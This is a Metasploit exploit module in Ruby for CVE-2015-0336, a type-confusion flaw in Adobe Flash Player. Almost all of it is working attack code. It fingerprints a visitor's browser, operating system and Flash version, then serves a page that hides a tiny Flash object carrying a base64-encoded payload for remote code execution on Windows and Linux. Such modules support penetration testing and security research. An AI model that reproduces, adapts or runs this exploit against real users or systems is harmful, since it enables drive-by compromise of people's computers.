##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Adobe Flash Player NetConnection Type Confusion',
        'Description' => %q{
          This module exploits a type confusion vulnerability in the NetConnection class on
          Adobe Flash Player. When using a correct memory layout this vulnerability allows
          to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like
          vectors, and ultimately accomplish remote code execution. This module has been tested
          successfully on:
          * Windows 7 SP1 (32-bit), IE 8, IE11 and Adobe Flash 16.0.0.305.
          * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.305.
          * Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305.
          * Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.424.
          * Ubuntu 14.04.2 LTS, Firefox 33.0 and Adobe Flash 11.2.202.442.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Natalie Silvanovich', # Vulnerability discovery and Google Project Zero Exploit
          'Unknown', # Exploit in the wild
          'juan vazquez' # msf module
        ],
        'References' => [
          ['CVE', '2015-0336'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-05.html'],
          ['URL', 'http://googleprojectzero.blogspot.com/2015/04/a-tale-of-two-exploits.html'],
          ['URL', 'http://malware.dontneedcoffee.com/2015/03/cve-2015-0336-flash-up-to-1600305-and.html'],
          ['URL', 'https://www.fireeye.com/blog/threat-research/2015/03/cve-2015-0336_nuclea.html'],
          ['URL', 'https://blog.malwarebytes.org/exploits-2/2015/03/nuclear-ek-leverages-recently-patched-flash-vulnerability/']
        ],
        'Payload' => {
          'DisableNops' => true
        },
        'Platform' => ['win', 'linux'],
        'Arch' => [ARCH_X86],
        'BrowserRequirements' => {
          :source => /script|headers/i,
          :arch => ARCH_X86,
          :os_name => lambda do |os|
            os =~ OperatingSystems::Match::LINUX ||
              os =~ OperatingSystems::Match::WINDOWS_7 ||
              os =~ OperatingSystems::Match::WINDOWS_81
          end,
          :ua_name => lambda do |ua|
            case target.name
            when 'Windows'
              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
            when 'Linux'
              return true if ua == Msf::HttpClients::FF
            end

            false
          end,
          :flash => lambda do |ver|
            case target.name
            when 'Windows'
              return true if ver =~ /^16\./ && Rex::Version.new(ver) <= Rex::Version.new('16.0.0.305')
            when 'Linux'
              return true if ver =~ /^11\./ && Rex::Version.new(ver) <= Rex::Version.new('11.2.202.442')
            end

            false
          end
        },
        'Targets' => [
          [
            'Windows',
            {
              'Platform' => 'win'
            }
          ],
          [
            'Linux',
            {
              'Platform' => 'linux'
            }
          ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2015-03-12',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def exploit
    @swf = create_swf
    @trigger = create_trigger

    super
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache' })
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), { 'Pragma' => 'no-cache' })
  end

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    b64_payload = Rex::Text.encode_base64(target_payload)
    os_name = target_info[:os_name]

    if target.name =~ /Windows/
      platform_id = 'win'
    elsif target.name =~ /Linux/
      platform_id = 'linux'
    end

    trigger_hex_stream = @trigger.unpack('H*')[0]

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>&tr=<%=trigger_hex_stream%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>&tr=<%=trigger_hex_stream%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'msf.swf')
    swf = ::File.open(path, 'rb') { |f| swf = f.read }

    swf
  end

  def create_trigger
    if target.name =~ /Linux/
      path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'trigger_linux.swf')
    else
      path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'trigger.swf')
    end

    swf = ::File.open(path, 'rb') { |f| swf = f.read }

    swf
  end
end
